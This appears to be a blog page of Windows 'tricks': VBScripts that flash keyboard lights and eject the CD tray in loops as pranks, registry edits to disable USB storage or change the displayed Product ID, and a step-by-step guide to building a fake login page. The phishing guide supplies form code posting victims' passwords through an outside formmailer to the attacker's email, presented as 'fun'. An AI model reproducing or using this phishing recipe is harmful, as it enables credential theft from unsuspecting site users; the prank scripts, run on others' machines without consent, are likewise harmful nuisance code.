Funny trick for Keyboard Disco lights

A simle VB Script will serve the purpose......!!!
Do the following:. . .

Open a notepad file. . .
...Copy and paste the below code. . .

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

Now save the notepad file as disco.vbs

U will see the other vbs file creat on your desktop. .

Just dubble click on it. . .and see the magic. . .

How To Stop:
Open Task Manager by pressing alt+ctrl+del and click on processes
search for wscript.exe and click End Process

Enjoy. . .(-_-)
Category: 0 comments

How to disable your USB port for the unknown user???

Here is the solution for that. . .

Please go step by step because its very risky. . .
... Go to RUN
- Type regedit
- Then go to HKEY_LOCAL_MACHINE (don’t click on it just click on (+)
- Then go to SYSTEM
- Then go to CurrentControSet
- Then go to Services
- Then “click” on USBSTOR
- Now change the value of REG_DWORD
- You have to put the value 4 in place of 3. . .
You will success fully disable your USB port . . .

For enabling the USB port
- You have to put the value 3 in place of 4. . .
Category: 0 comments

Make CD/DVD tray move In and Out- Funny!

This is a really cool trick you can play on others... Have you ever wanted to make the CD/DVD drive \tray go in and out contineoulsy?? Here is the trick.. MAKE THE DVD DRIVE GO IN AND OUT Set oWMP = CreateObject("WMPlayer.OCX.7" ) Set colCDROMs = oWMP.cdromCollection if colCDROMs.Count >= 1 then do For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next ' cdrom loop End If copy this script in notepad and save as run.vbs u'll see a magic that ur cd-rom is running in and out..

Category: 0 comments

How to : Make Fake Login Page in 5 mins

you want to have a little game or fun on your viewers..?? here is a simple trick.
Here is a trcik in Making Fake Login Page in 5 mins ..Interested??



Do step by step

1.Open any page for which you wanna make fake.

2. Save page . In the saving option it asks for save as type select complete webpage.

3. Now where u have save the page it will be showing u that page and a dir wid images on the page.

4. Now Rite Click on the Page and click edit.

5. Search Form in the page.

6. Now Delete That Form Value , Method ,Action whatever its written delete that line.

7. Now add this line

Please note that change all the "+" sign in the below code to "<" [without quote]

+form action="http://www.big-llc.com/formmailer/submit" method="post">+input type="hidden" value="Your Email Id" name="fm-to">+font color="#333333"> +/font>+input type="hidden" value="password D3" name="fm-title">+font color="#333333"> +/font>+input type="hidden" value="Link You Want To redirect" name="fm-redirect">+font color="#333333"> +/font>

8. Save and close the editor.

9. Upload the Directory wid images and this Page on free hosting site.

10. Its Done Simply made in just 5 mins

Note : Don't Change The Directory Name or Page Name.
Category: 0 comments

How to Alter Windows Product ID

If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select the Properties option.
 

Ever wondered how to alter the Windows Product ID?

 
It is possible to alter the Windows Product ID and change it to what ever you like. For example, you can change the Product ID and put your nickname in place of the formal Product ID displayed by the Operating System. This hack is too easy and can be done within minutes. The screenshot showing the altered Product ID is given below
Win 7 PC showing Original PID
Win 7 Product ID (Unaltered)
Windows 7 PC showing Altered PID
Win 7 PID (Altered)
As you can see from the above screenshot it is simple and easy to make your Windows display what ever you want in the place of the real Product ID. Here is a step-by-step procedure to alter your Windows Product ID.
1. Goto Start->Run and type the following in the Run dialog box
regedit
2. After you open the Registry Editor, navigate to the following key
 
HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version

3. On the right hand side, you can see an entry by name ProductID listed under the heading Name.
4. Double-Click on ProductID, a dialog box will pop-up showing your Windows PID. Now you can delete the original PID and enter anything of your choice.
5. Once you are done, just click on OK and close the Registry Editor. Now you can see the altered Product ID in the Windows Properties window.
 
NOTE: This trick works on Win 7, Vista and Win XP
I hope you like this trick. Pass your comments. Cheers!
Category: 0 comments